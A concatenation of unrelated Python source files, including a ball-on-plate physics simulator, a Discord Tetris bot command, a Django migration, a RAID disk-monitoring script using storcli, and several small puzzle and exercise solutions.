z_pos = clamp(
z_pos,
PLATE_HEIGHT_MAX / 2.0 - self.plate_z_limit,
PLATE_HEIGHT_MAX / 2.0 + self.plate_z_limit,
)
# Now convert back to plane parameters
self.plate_theta_x = theta_x
self.plate_theta_y = theta_y
self.plate.z = z_pos
# ball intertia with radius and hollow radius
# I = 2/5 * m * ((r^5 - h^5) / (r^3 - h^3))
def _ball_inertia(self):
hollow_radius = self.ball_radius - self.ball_shell
return (
2.0
/ 5.0
* self.ball_mass
* (
(math.pow(self.ball_radius, 5.0) - math.pow(hollow_radius, 5.0))
/ (math.pow(self.ball_radius, 3.0) - math.pow(hollow_radius, 3.0))
)
)
def _camera_pos(self) -> Vector3:
""" camera origin (lens center) in world space """
return Vector3([0.0, 0.0, -0.052])
def _update_estimated_ball(self, ball: Vector3):
"""
Ray trace the ball position and an edge of the ball back to the camera
origin and use the collision points with the tilted plate to estimate
what a camera might perceive the ball position and size to be.
"""
# contact ray from camera to plate
camera = self._camera_pos()
displacement = camera - self.ball
displacement_radius = camera - (self.ball + Vector3([self.ball_radius, 0, 0]))
ball_ray = ray.create(camera, displacement)
ball_radius_ray = ray.create(camera, displacement_radius)
surface_plane = self._surface_plane()
contact = Vector3(ray_intersect_plane(ball_ray, surface_plane, False))
radius_contact = Vector3(
ray_intersect_plane(ball_radius_ray, surface_plane, False)
)
x, y = contact.x, contact.y
r = math.fabs(contact.x - radius_contact.x)
# add the noise in
self.estimated_x = x + MoabModel.random_noise(self.ball_noise)
self.estimated_y = y + MoabModel.random_noise(self.ball_noise)
self.estimated_radius = r + MoabModel.random_noise(self.ball_noise)
# Use n-1 states to calculate an estimated velocity.
self.estimated_vel_x = (
self.estimated_x - self.prev_estimated_x
) / self.step_time
self.estimated_vel_y = (
self.estimated_y - self.prev_estimated_y
) / self.step_time
# distance to target
self.estimated_distance = MoabModel.distance_to_point(
self.estimated_x, self.estimated_y, self.target_x, self.target_y
)
# update the derived states
self.estimated_speed = cast(float, vector.length(
[self.ball_vel.x, self.ball_vel.y, self.ball_vel.z]
))
self.estimated_direction = MoabModel.heading_to_point(
self.estimated_x,
self.estimated_y,
self.estimated_vel_x,
self.estimated_vel_y,
self.target_x,
self.target_y,
)
# update for next time
self.prev_estimated_x = self.estimated_x
self.prev_estimated_y = self.estimated_y
# update ball position in plate origin coordinates, and obstacle distance and direction
self.ball_on_plate = self.world_to_plate(self.ball.x, self.ball.y, self.ball.z)
self.obstacle_distance = self._get_obstacle_distance()
self.obstacle_direction = MoabModel.heading_to_point(
self.ball.x,
self.ball.y,
self.ball_vel.x,
self.ball_vel.y,
self.obstacle_x,
self.obstacle_y,
)
def _get_obstacle_distance(self) -> float:
# Ignore z value, calculate distance between obstacle and ball projection on plate
distance_between_centers = math.sqrt(
math.pow(self.ball_on_plate.x - self.obstacle_x, 2.0)
+ math.pow(self.ball_on_plate.y - self.obstacle_y, 2.0)
)
# Negative distance to obstacle means the ball and obstacle are overlapping
return distance_between_centers - self.ball_radius - self.obstacle_radius
def _surface_plane(self) -> Plane:
"""
Return the surface plane of the plate
"""
plate_surface = np.array(
[self.plate.x, self.plate.y, self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET]
)
return create_from_position(plate_surface, self._plate_nor())
def _motion_for_time(
self, u: Vector3, a: Vector3, t: float
) -> Tuple[Vector3, Vector3]:
"""
Equations of motion for displacement and final velocity
u: initial velocity
a: acceleration
d: displacement
v: final velocity
d = ut + 1/2at^2
v = u + at
returns (d, v)
"""
d = (u * t) + (0.5 * a * (t ** 2))
v = u + a * t
return d, v
def _update_ball_z(self):
self.ball.z = (
self.ball.x * math.sin(-self.plate_theta_y)
+ self.ball.y * math.sin(self.plate_theta_x)
+ self.ball_radius
+ self.plate.z
+ PLATE_ORIGIN_TO_SURFACE_OFFSET
)
def _ball_plate_contact(self, step_t: float) -> float:
# NOTE: the x_theta axis creates motion in the Y-axis, and vice versa
# x_theta, y_theta = self._xy_theta_from_nor(self.plate_nor.xyz)
x_theta = self.plate_theta_x
y_theta = self.plate_theta_y
# Equations for acceleration on a plate at rest
# accel = (mass * g * theta) / (mass + inertia / radius^2)
# (y_theta,x are intentional swapped here.)
theta = Vector3([y_theta, -x_theta, 0])
self.ball_acc = (
theta
/ (self.ball_mass + self._ball_inertia() / (self.ball_radius ** 2))
* self.ball_mass
* self.gravity
)
# get contact displacement
disp, vel = self._motion_for_time(self.ball_vel, self.ball_acc, step_t)
# simplified ball mechanics against a plane
self.ball.x += disp.x
self.ball.y += disp.y
self._update_ball_z()
self.ball_vel = vel
# For rotation on plate motion we use infinite friction and
# perfect ball / plate coupling.
# Calculate the distance we traveled across the plate during
# this time slice.
rot_distance = math.hypot(disp.x, disp.y)
if rot_distance > 0:
# Calculate the fraction of the circumference that we traveled
# (in radians).
rot_angle = rot_distance / self.ball_radius
# Create a quaternion that represents the delta rotation for this time period.
# Note that we translate the (x, y) direction into (y, -x) because we're
# creating a vector that represents the axis of rotation which is normal
# to the direction the ball traveled in the x/y plane.
rot_q = quaternion.normalize(
np.array(
[
disp.y / rot_distance * math.sin(rot_angle / 2.0),
-disp.x / rot_distance * math.sin(rot_angle / 2.0),
0.0,
math.cos(rot_angle / 2.0),
]
)
)
old_rot = self.ball_qat.xyzw
new_rot = quaternion.cross(quat1=old_rot, quat2=rot_q)
self.ball_qat.xyzw = quaternion.normalize(new_rot)
return 0.0
def plate_to_world(self, x: float, y: float, z: float) -> Vector3:
# rotate
x_rot = matrix44.create_from_axis_rotation([1.0, 0.0, 0.0], self.plate_theta_x)
y_rot = matrix44.create_from_axis_rotation([0.0, 1.0, 0.0], self.plate_theta_y)
vec = matrix44.apply_to_vector(mat=x_rot, vec=[x, y, z])
vec = matrix44.apply_to_vector(mat=y_rot, vec=vec)
# translate
move = matrix44.create_from_translation(
[self.plate.x, self.plate.y, self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET]
)
vec = matrix44.apply_to_vector(mat=move, vec=vec)
return Vector3(vec)
def world_to_plate(self, x: float, y: float, z: float) -> Vector3:
move = matrix44.create_from_translation(
[
-self.plate.x,
-self.plate.y,
-(self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET),
]
)
vec = matrix44.apply_to_vector(mat=move, vec=[x, y, z])
# rotate
x_rot = matrix44.create_from_axis_rotation([1.0, 0.0, 0.0], -self.plate_theta_x)
y_rot = matrix44.create_from_axis_rotation([0.0, 1.0, 0.0], -self.plate_theta_y)
vec = matrix44.apply_to_vector(mat=x_rot, vec=vec)
vec = matrix44.apply_to_vector(mat=y_rot, vec=vec)
return Vector3(vec)
def set_initial_ball(self, x: float, y: float, z: float):
self.ball.xyz = [x, y, z]
self._update_ball_z()
# Set initial observations
self._update_estimated_ball(self.ball)
pass
def update_ball(self, ball_reset: bool = False):
"""
Update the ball position with the physics model.
"""
if ball_reset:
# this just ensures that the ball is on the plate
self._update_ball_z()
else:
self._ball_plate_contact(self.step_time)
# Finally, lets make some approximations for observations
self._update_estimated_ball(self.ball)
def state(self) -> Dict[str, float]:
# x_theta, y_theta = self._xy_theta_from_nor(self.plate_nor)
plate_nor = self._plate_nor()
return dict(
# reflected input controls
roll=self.roll,
pitch=self.pitch,
height_z=self.height_z,
# reflected constants
time_delta=self.time_delta,
jitter=self.jitter,
step_time=self.step_time,
elapsed_time=self.elapsed_time,
gravity=self.gravity,
plate_radius=self.plate_radius,
plate_theta_vel_limit=self.plate_theta_vel_limit,
plate_theta_acc=self.plate_theta_acc,
plate_theta_limit=self.plate_theta_limit,
plate_z_limit=self.plate_z_limit,
ball_mass=self.ball_mass,
ball_radius=self.ball_radius,
ball_shell=self.ball_shell,
obstacle_radius=self.obstacle_radius,
obstacle_x=self.obstacle_x,
obstacle_y=self.obstacle_y,
target_x=self.target_x,
target_y=self.target_y,
# modelled plate metrics
plate_x=self.plate.x,
plate_y=self.plate.y,
plate_z=self.plate.z,
plate_nor_x=plate_nor.x,
plate_nor_y=plate_nor.y,
plate_nor_z=plate_nor.z,
plate_theta_x=self.plate_theta_x,
plate_theta_y=self.plate_theta_y,
plate_theta_vel_x=self.plate_theta_vel_x,
plate_theta_vel_y=self.plate_theta_vel_y,
plate_vel_z=self.plate_vel_z,
# modelled ball metrics
ball_x=self.ball.x,
ball_y=self.ball.y,
ball_z=self.ball.z,
ball_vel_x=self.ball_vel.x,
ball_vel_y=self.ball_vel.y,
ball_vel_z=self.ball_vel.z,
ball_qat_x=self.ball_qat.x,
ball_qat_y=self.ball_qat.y,
ball_qat_z=self.ball_qat.z,
ball_qat_w=self.ball_qat.w,
ball_on_plate_x=self.ball_on_plate.x,
ball_on_plate_y=self.ball_on_plate.y,
obstacle_distance=self.obstacle_distance,
obstacle_direction=self.obstacle_direction,
# modelled camera observations
estimated_x=self.estimated_x,
estimated_y=self.estimated_y,
estimated_radius=self.estimated_radius,
estimated_vel_x=self.estimated_vel_x,
estimated_vel_y=self.estimated_vel_y,
# modelled positions and velocities
estimated_speed=self.estimated_speed,
estimated_direction=self.estimated_direction,
estimated_distance=self.estimated_distance,
ball_noise=self.ball_noise,
plate_noise=self.plate_noise,
# meta vars
ball_fell_off=1 if self.halted() else 0,
iteration_count=self.iteration_count,
)
|
class NoPrivateKeyException(Exception):
def __init__(self):
super(NoPrivateKeyException, self).__init__("Please provide an Private-Key before getting contents.")
|
import asyncio
import config
from forumsweats import db
import time
from typing import Any, Dict, List, Literal, Union
from forumsweats.commandparser import Context
import discord
import random
name = 'tetris'
aliases = ['tetris']
pieces = [
{
# I piece
'color': '🟦',
'ghost_color': '🔵',
'shape': [
[1, 1, 1, 1]
]
},
{
# J piece
'color': '🟫',
'ghost_color': '🟤',
'shape': [
[1, 0, 0],
[1, 1, 1]
]
},
{
# L piece
'color': '🟧',
'ghost_color': '🟠',
'shape': [
[0, 0, 1],
[1, 1, 1]
]
},
{
# O piece
'color': '🟨',
'ghost_color': '🟡',
'shape': [
[1, 1],
[1, 1]
]
},
{
# S piece
'color': '🟩',
'ghost_color': '🟢',
'shape': [
[0, 1, 1],
[1, 1, 0]
]
},
{
# T piece
'color': '🟪',
'ghost_color': '🟣',
'shape': [
[0, 1, 0],
[1, 1, 1]
]
},
{
# Z piece
'color': '🟥',
'ghost_color': '🔴',
'shape': [
[1, 1, 0],
[0, 1, 1]
]
}
]
background_color = '⬛'
board_width = 10
# board_height = 20
board_height = 19 # discord limits the number of emojis a message can have to 199
default_board = [
[ background_color ] * board_height
] * board_width
active_channels = []
def is_position_possible(game_board, shape: List[List[Literal[0, 1]]], x: int, y: int):
'Check if the piece can be at a given position'
for relative_y, row in enumerate(shape):
for relative_x, cell in enumerate(row):
if cell:
if x + relative_x < 0 or x + relative_x >= board_width:
return False
if y + relative_y < 0 or y + relative_y >= board_height:
return False
if game_board[x + relative_x][y + relative_y] != background_color:
return False
return True
def render_board_embed(original_game_board, score: int, held_piece=None, piece=None, piece_x: int=None, piece_y: int=None):
'Create an embed for the Tetris board'
# copy the board so we don't modify the original
game_board = [ row[:] for row in original_game_board ]
if piece and piece_x is not None and piece_y is not None:
# overlay the piece onto the game board
game_board = overlay_piece_onto_board(game_board, piece, piece_x, piece_y)
# overlay the ghost, which is always at the place where the piece would be if it drops
ghost_piece = { 'color': piece['ghost_color'], 'shape': piece['shape'] }
ghost_piece_y = piece_y
while is_position_possible(original_game_board, ghost_piece['shape'], piece_x, ghost_piece_y + 1):
ghost_piece_y += 1
game_board = overlay_piece_onto_board(game_board, ghost_piece, piece_x, ghost_piece_y)
board_render = ''
for y in range(len(game_board[0])):
for x in range(len(game_board)):
board_render += game_board[x][y]
board_render += f'\n'
embed = discord.Embed(
title = f'Tetris (score: {score:,})',
description = board_render,
colour = discord.Colour.blue(),
)
if held_piece:
held_piece_render = ''
for x in range(len(held_piece['shape'])):
for y in range(len(held_piece['shape'][0])):
held_piece_render += held_piece['color'] if held_piece['shape'][x][y] else background_color
held_piece_render += '\n'
embed.add_field(
name = 'Holding Piece',
value = held_piece_render
)
return embed
def overlay_piece_onto_board(game_board, piece, piece_x, piece_y):
'Overlay the piece onto the board'
for y, row in enumerate(piece['shape']):
for x, cell in enumerate(row):
if cell and game_board[piece_x + x][piece_y + y] == background_color:
game_board[piece_x + x][piece_y + y] = piece['color']
return game_board
def rotate_shape_clockwise(shape):
'Rotate the shape clockwise'
# copy the shape so we don't modify the original
shape = [ list(row) for row in shape ]
return [ [ shape[y][x] for y in range(len(shape)-1, -1, -1) ] for x in range(len(shape[0])) ]
def rotate_shape_counterclockwise(shape):
'Rotate the shape counterclockwise'
# copy the shape so we don't modify the original
shape = [ list(row) for row in shape ]
return [ [ shape[y][x] for y in range(len(shape)) ] for x in range(len(shape[0])-1, -1, -1) ]
async def run(message: Context):
'Play Tetris in Discord'
if not await db.has_shop_item(message.author.id, 'tetris'):
return await message.send(f'You need to buy tetris from {config.prefix}shop.')
if message.channel.id in active_channels:
return await message.reply('There\'s already a game of Tetris going on in this channel, please wait for it to end.')
active_channels.append(message.channel.id)
# the game board, this doesn't include the current piece that is moving
game_board = [ row[:] for row in default_board ]
view = discord.ui.View(timeout=None)
ui_button_left = discord.ui.Button(
custom_id='left',
style=discord.ButtonStyle.primary,
emoji='◀️',
row=1
)
view.add_item(ui_button_left)
ui_button_drop = discord.ui.Button(
custom_id='drop',
style=discord.ButtonStyle.success,
emoji='⏬',
row=1
)
view.add_item(ui_button_drop)
ui_button_right = discord.ui.Button(
custom_id='right',
style=discord.ButtonStyle.primary,
emoji='▶️',
row=1
)
view.add_item(ui_button_right)
ui_button_spin_counterclockwise = discord.ui.Button(
custom_id='spin_counterclockwise',
style=discord.ButtonStyle.secondary,
emoji='🔄',
row=2
)
view.add_item(ui_button_spin_counterclockwise)
ui_button_down = discord.ui.Button(
custom_id='down',
style=discord.ButtonStyle.primary,
emoji='🔽',
row=2
)
view.add_item(ui_button_down)
ui_button_spin_clockwise = discord.ui.Button(
custom_id='spin_clockwise',
style=discord.ButtonStyle.secondary,
emoji='🔃',
row=2
)
view.add_item(ui_button_spin_clockwise)
ui_button_hold = discord.ui.Button(
custom_id='hold',
style=discord.ButtonStyle.secondary,
emoji='♻️',
row=3
)
view.add_item(ui_button_hold)
game_message = await message.reply(
embed = render_board_embed(game_board, 0),
view = view
)
# whether the game hasn't ended
playing = True
# the current piece
piece: Union[dict[str, Any], None] = None
piece_x = 0
piece_y = 0
held_piece = None
last_edit = time.time()
bag = []
score = 0
has_held_this_round = False
# whether nothing will move down this round
frozen_turn = False
def choose_piece():
'Choose a random piece to play'
nonlocal bag
# https://tetris.fandom.com/wiki/Random_Generator
if not bag:
bag = [ piece for piece in pieces ]
random.shuffle(bag)
return bag.pop()
def choose_new_piece(new_piece: Dict[str, Any]=None):
'Choose a new piece to place'
nonlocal piece
nonlocal piece_x
nonlocal piece_y
piece = new_piece or choose_piece()
piece_x = int(board_width / 2 - len(piece['shape'][0]) / 2)
piece_y = 0
async def on_interact(interaction: discord.interactions.Interaction):
# this prevents other people from interacting with the game
return interaction.user == message.author
async def button_click_left(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if piece and is_position_possible(game_board, piece['shape'], piece_x - 1, piece_y):
piece_x -= 1
async def button_click_right(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if piece and is_position_possible(game_board, piece['shape'], piece_x + 1, piece_y):
piece_x += 1
async def button_click_spin_clockwise(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if not piece: return
new_shape = rotate_shape_clockwise(piece['shape'])
if is_position_possible(game_board, new_shape, piece_x, piece_y):
piece['shape'] = new_shape
async def button_click_spin_counterclockwise(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if not piece: return
new_shape = rotate_shape_counterclockwise(piece['shape'])
if is_position_possible(game_board, new_shape, piece_x, piece_y):
piece['shape'] = new_shape
async def button_click_down(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal score
if piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
piece_y += 1
score += 1
async def button_click_drop(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal score
while piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
piece_y += 1
score += 2
async def button_click_hold(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal held_piece
nonlocal has_held_this_round
if has_held_this_round:
return
has_held_this_round = True
if held_piece is None:
held_piece = piece
choose_new_piece()
else:
piece, held_piece = held_piece, piece
choose_new_piece(piece)
frozen_turn = True
def clear_lines():
'Clear any full lines and award points'
nonlocal game_board
nonlocal score
nonlocal bag
lines_cleared = 0
y = board_height - 1
while y > 0:
if all(row[y] != background_color for row in game_board):
# remove the column
for x in range(board_width):
game_board[x].pop(y)
# shift everything down
for x in range(board_width):
game_board[x].insert(0, background_color)
lines_cleared += 1
else:
y -= 1
if lines_cleared == 1:
score += 100
elif lines_cleared == 2:
score += 300
elif lines_cleared == 3:
score += 500
elif lines_cleared == 4:
score += 800
view.interaction_check = on_interact
ui_button_left.callback = button_click_left
ui_button_right.callback = button_click_right
ui_button_spin_clockwise.callback = button_click_spin_clockwise
ui_button_spin_counterclockwise.callback = button_click_spin_counterclockwise
ui_button_down.callback = button_click_down
ui_button_drop.callback = button_click_drop
ui_button_hold.callback = button_click_hold
choose_new_piece()
while playing:
try:
# do the game loop
last_edit = time.time()
if piece:
await game_message.edit(
embed = render_board_embed(game_board, score, held_piece, piece, piece_x, piece_y)
)
else:
await game_message.edit(
embed = render_board_embed(game_board, score, held_piece)
)
choose_new_piece()
frozen_turn = True
if piece and not is_position_possible(game_board, piece['shape'], piece_x, piece_y):
playing = False
await asyncio.sleep(time.time() - last_edit + 1)
if piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
if frozen_turn:
frozen_turn = False
else:
piece_y += 1
else:
# the piece can't be moved down anymore, choose a new piece
game_board = overlay_piece_onto_board(game_board, piece, piece_x, piece_y)
piece = None
clear_lines()
has_held_this_round = False
except:
await asyncio.sleep(1)
embed = render_board_embed(game_board, score, held_piece)
embed.title = f'Game over (score: {score:,})'
await game_message.edit(embed = embed)
view.stop()
active_channels.remove(message.channel.id)
|
# Generated by Django 3.0.5 on 2020-05-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('investment_tracker', '0004_auto_20200514_1518'),
]
operations = [
migrations.RunSQL(
"""UPDATE investment_tracker_accountshares
SET peak_pct_of_balance = 1/pct_of_peak;"""),
migrations.RunSQL(
"""UPDATE investment_tracker_accountshares
SET trough_pct_of_balance = 1/pct_of_trough
WHERE pct_of_trough is not NULL;"""),
]
|
#!/usr/bin/env python3
import subprocess as sp
import os
import json
STORCLI_EXEC = "/opt/MegaRAID/storcli/storcli64"
if not os.path.exists(STORCLI_EXEC):
STORCLI_EXEC = "storcli"
class StorCliBase():
def __init__(self):
# self check
output = self.run(["/c0", "show", "nolog"])
status = output['Controllers'][0]['Command Status']['Status']
if status != 'Success':
raise RuntimeError("Self-check failed. Did you run this script with root? (Controller status gets {} rather than 'Success')".format(status))
def run(self, args: list):
# Get JSON output
ret = sp.run([STORCLI_EXEC, *args, "J"], stdout=sp.PIPE)
if ret.returncode != 0:
raise RuntimeError("storcli returns a non-zero value.")
return json.loads(ret.stdout)
def get_physical_disk_info(self):
return self.run(['/call', '/eall', '/sall', 'show', 'all', 'nolog'])
storcli = StorCliBase()
def update_dict(dict, key, value_dict):
if key not in dict:
dict[key] = value_dict
else:
dict[key].update(value_dict)
def get_disk_errors():
pdinfo = storcli.get_physical_disk_info()['Controllers']
info = {}
for adapter in pdinfo:
adapter_id = adapter['Command Status']['Controller']
adapter_info = {}
adapter_response = adapter['Response Data']
for key in adapter_response:
if 'Detailed Information' in key:
disk = key.split("-")[0].strip()
state = adapter_response[key][disk + " State"]
media_error = int(state['Media Error Count'])
other_error = int(state['Other Error Count'])
predictive_failure = int(state['Predictive Failure Count'])
smart = state["S.M.A.R.T alert flagged by drive"]
update_dict(adapter_info, disk, {
'media_error': media_error,
'other_error': other_error,
'predictive_failure': predictive_failure,
'smart_alert': smart,
})
else:
drive_info = adapter_response[key][0] # WHY THIS IS A LIST???
state = drive_info['State']
spin = drive_info['Sp']
firmware_state = "{state}, Spin {spin}".format(state=state, spin='Up' if spin == 'U' else 'Down')
update_dict(adapter_info, key, {
'firmware': firmware_state,
})
info[adapter_id] = adapter_info
return info
if __name__ == '__main__':
print(get_disk_errors())
# Return example:
# {0: {'Drive /c0/e252/s0': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s1': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s4': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s5': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s6': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s7': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}}, 1: {'Drive /c1/e252/s0': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s1': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s2': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s3': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s4': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s5': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s6': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}}}
|
import logging
formatter = logging.Formatter('%(clineno)d: %(message)s')
fileHandler = logging.FileHandler('misc/output/test06.log', 'w')
fileHandler.setFormatter(formatter)
logger01 = logging.getLogger('test')
logger01.addHandler(fileHandler)
logger01.setLevel(logging.DEBUG)
|
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()
print('\nprint out the list of wells')
for wf in [ WF_N, WF_S, ]:
print( "\nField", wf.field_name )
for i in wf.Well_list:
print( '\nWell', i.wellname )
print ( 'wellhead X %+5d Y %+5d Z %+5d well_length %d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z, i.well_length ) )
print('\nprint out the geometry data for well', i.wellname )
for s in i.geometry:
print( 'Inclination %.1f tangent %.1f vertical %.1f. Start length %.1f. End point X Y Z (%.1f, %.1f, %.1f)' % ( s.inclination, s.tangent, s.vertical, s.start_length, s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
print ( '\nfield size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ) )
print("\nEnd")
|
def get_input(filename):
max_x = 0
max_y = 0
with open(filename, "r") as f:
for line in f.readlines():
line = line.strip()
if line == "":
break
x, y = line.split(",")
x = int(x)
y = int(y)
if x > max_x:
max_x = x
if y > max_y:
max_y = y
reading_folds = False
folds = []
paper = [["." for x in range(max_x + 1)] for _ in range(max_y + 1)]
with open(filename, "r") as f:
for line in f.readlines():
line = line.strip()
if line == "":
reading_folds = True
continue
if not reading_folds:
x, y = line.split(",")
paper[int(y)][int(x)] = "#"
else:
folds.append(line.split(" ")[-1])
return paper, folds
def do_folds(paper, folds, fold_count=None):
count = 0
for fold in folds:
axis = fold[0]
loc = int(fold.split("=")[-1])
if axis == "y":
for y in range(loc + 1, len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
paper[y][x] = "."
offset = (y - loc) * 2
paper[y-offset][x] = "#"
paper = paper[:loc]
elif axis == "x":
for y in range(len(paper)):
for x in range(loc + 1, len(paper[0])):
if paper[y][x] == "#":
paper[y][x] = "."
offset = (x - loc) * 2
paper[y][x-offset] = "#"
for y in range(len(paper)):
paper[y] = paper[y][:loc]
count += 1
if fold_count and count == fold_count:
return paper
return paper
def count_dots(paper):
dots = 0
for y in range(len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
dots += 1
return dots
def main():
paper, folds = get_input("input")
paper = do_folds(paper, folds, 1)
dots = count_dots(paper)
print("Part 1:")
print(f"{dots} dots are visible after one fold")
print()
paper, folds = get_input("input")
paper = do_folds(paper, folds)
print("Part 2:")
# this makes it more visible on my terminal
for y in range(len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
print(" X ", end="")
else:
print(" ", end="")
print()
if __name__ == "__main__":
main()
|
""" Problem: Python If-Else || Task:
Given an integer, n, perform the following conditional actions:
1. If n is odd, print Weird
2. If n is even and in the inclusive range of 2 to 5, print Not Weird
3. If n is even and in the inclusive range of 6 to 20, print Weird
4. If n is even and greater than 20, print Not Weird
"""
N = int(input())
if N % 2 != 0:
print("Weird")
elif N % 2 == 0:
if N in range (2, 6):
print("Not Weird")
if N in range (6, 21):
print("Weird")
elif N > 20:
print("Not Weird")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.